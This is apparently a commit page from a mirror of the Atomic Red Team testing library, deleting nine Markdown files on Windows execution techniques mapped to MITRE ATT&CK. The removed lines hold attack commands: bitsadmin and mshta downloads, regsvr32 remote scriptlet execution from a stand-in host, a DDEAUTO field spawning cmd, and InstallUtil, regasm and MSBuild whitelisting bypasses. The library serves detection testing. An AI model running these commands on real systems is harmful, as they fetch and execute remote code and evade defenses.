security-tools/atomic-red-team
1
0
Fork 0
Code Issues Pull Requests Actions Packages Projects Releases Wiki Activity

delete yamlized things

Browse Source
This commit is contained in:
caseysmithrc
2018-05-23 20:02:58 -06:00
parent 05022acaa9
commit 9985eef477
9 changed files with 0 additions and 135 deletions
Download Patch File Download Diff File Expand all files Collapse all files
Windows/Execution/Bitsadmin.md
-11
View File
@@ -1,11 +0,0 @@
## BITS Jobs
MITRE ATT&CK Technique: [T1197](https://attack.mitre.org/wiki/Technique/T1197)
### bitsadmin.exe
bitsadmin.exe /transfer /Download /priority Foreground https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/Windows/Execution/Bitsadmin.md $env:TEMP\AtomicRedTeam\bitsadmin_flag.ps1
### PowerShell
Start-BitsTransfer -Priority foreground -Source https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/Windows/Execution/Bitsadmin.md -Destination $env:TEMP\AtomicRedTeam\bitsadmin_flag.ps1
Windows/Execution/CMSTP.md
-15
View File
@@ -1,15 +0,0 @@
## CMSTP
MITRE ATT&CK Technique: [T1191](https://attack.mitre.org/wiki/Technique/T1191)
### Scriptlet execution
Local:
cmstp.exe /s CMSTP.inf
## Test Script
[CMSTP.INF](https://github.com/redcanaryco/atomic-red-team/blob/master/Windows/Payloads/CMSTP.inf)
[CMSTP.SCT](https://github.com/redcanaryco/atomic-red-team/blob/master/Windows/Payloads/CMSTP.sct)
Windows/Execution/Dynamic_Data_Exchange.md
-19
View File
@@ -1,19 +0,0 @@
# Dynamic Data Exchange
MITRE ATT&CK Technique: [T1173](https://attack.mitre.org/wiki/Technique/T1173)
### Microsoft Word
Open,
Insert tab -> Quick Parts -> Field
Choose = (Formula) and click ok.
After that, you should see a Field inserted in the document with an error “!Unexpected End of Formula”, right-click the Field, and choose Toggle Field Codes.
The Field Code should now be displayed, change it to Contain the following:
{DDEAUTO c:\\windows\\system32\\cmd.exe "/k calc.exe" }
Windows/Execution/InstallUtil.md
-15
View File
@@ -1,15 +0,0 @@
## InstallUtil
MITRE ATT&CK Technique: [T1118](https://attack.mitre.org/wiki/Technique/T1118)
### Execution Examples:
Input:
x86 - C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe /logfile= /LogToConsole=false /U InstallUtilBypass.dll
x64 - C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exe /logfile= /LogToConsole=false /U InstallUtilBypass.dll
## Test Script
[InstallUtilBypass.cs](https://github.com/redcanaryco/atomic-red-team/blob/master/Windows/Payloads/InstallUtilBypass.cs)
Windows/Execution/Mshta.md
-12
View File
@@ -1,12 +0,0 @@
## Mshta
MITRE ATT&CK Technique: [T1170](https://attack.mitre.org/wiki/Technique/T1170)
### Example Execution:
mshta vbscript:Close(Execute("GetObject(""script:https[:]//webserver/payload[.]sct"")"))
## Test Script
mshta.exe javascript:a=GetObject("script:https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/Windows/Payloads/mshta.sct").Exec();close();
[mshta.sct](https://github.com/redcanaryco/atomic-red-team/blob/master/Windows/Payloads/mshta.sct)
Windows/Execution/RegsvcsRegasm.md
-22
View File
@@ -1,22 +0,0 @@
## Regsvcs/Regasm
MITRE ATT&CK Technique: [T1121](https://attack.mitre.org/wiki/Technique/T1121)
### Execution Examples:
[DLL](https://github.com/redcanaryco/atomic-red-team/tree/master/Windows/Payloads/AllTheThings)
Input:
x86 C:\Windows\Microsoft.NET\Framework\v4.0.30319\regsvcs.exe AllTheThings.dll
x64 C:\Windows\Microsoft.NET\Framework64\v4.0.30319\regsvcs.exe AllTheThings.dll
x86 C:\Windows\Microsoft.NET\Framework\v4.0.30319\regasm.exe /U AllTheThings.dll
x64 C:\Windows\Microsoft.NET\Framework64\v4.0.30319\regasm.exe /U AllTheThings.dll
## Test Script
[RegSvcsRegAsmBypass.cs](https://github.com/redcanaryco/atomic-red-team/blob/master/Windows/Payloads/RegSvcsRegAsmBypass.cs)
Windows/Execution/Regsvr32.md
-16
View File
@@ -1,16 +0,0 @@
## Regsvr32
MITRE ATT&CK Technique: [T1117](https://attack.mitre.org/wiki/Technique/T1117)
### Local Scriptlet Execution:
regsvr32.exe /s /u /i:file.sct scrobj.dll
### Remote Scriptlet Exection:
regsvr32.exe /s /u /i:http://example.com/file.sct scrobj.dll
## Test Script
[regsvr32.sct](https://github.com/redcanaryco/atomic-red-team/blob/master/Windows/Payloads/RegSvr32.sct)
Windows/Execution/Rundll32.md
-13
View File
@@ -1,13 +0,0 @@
## Rundll32
MITRE ATT&CK Technique: [T1085](https://attack.mitre.org/wiki/Technique/T1085)
### Executes an export inside of a dll.
rundll32 AllTheThings.dll,EntryPoint
## Test Script
[AlltheThings.dll](https://github.com/redcanaryco/atomic-red-team/tree/master/Windows/Payloads/AllTheThings)
Windows/Execution/Trusted_Developer_Utilities.md
-12
View File
@@ -1,12 +0,0 @@
## Trusted Developer Utilities
MITRE ATT&CK Technique: [T1127](https://attack.mitre.org/wiki/Technique/T1127)
### MSBuild.exe - [Inline Tasks](https://msdn.microsoft.com/en-us/library/dd722601.aspx)
C:\Windows\Microsoft.Net\Framework\v4.0.30319\MSBuild.exe File.csproj
## Test Script
[MSBuildBypass.csproj](https://github.com/redcanaryco/atomic-red-team/blob/master/Windows/Payloads/MSBuildBypass.csproj)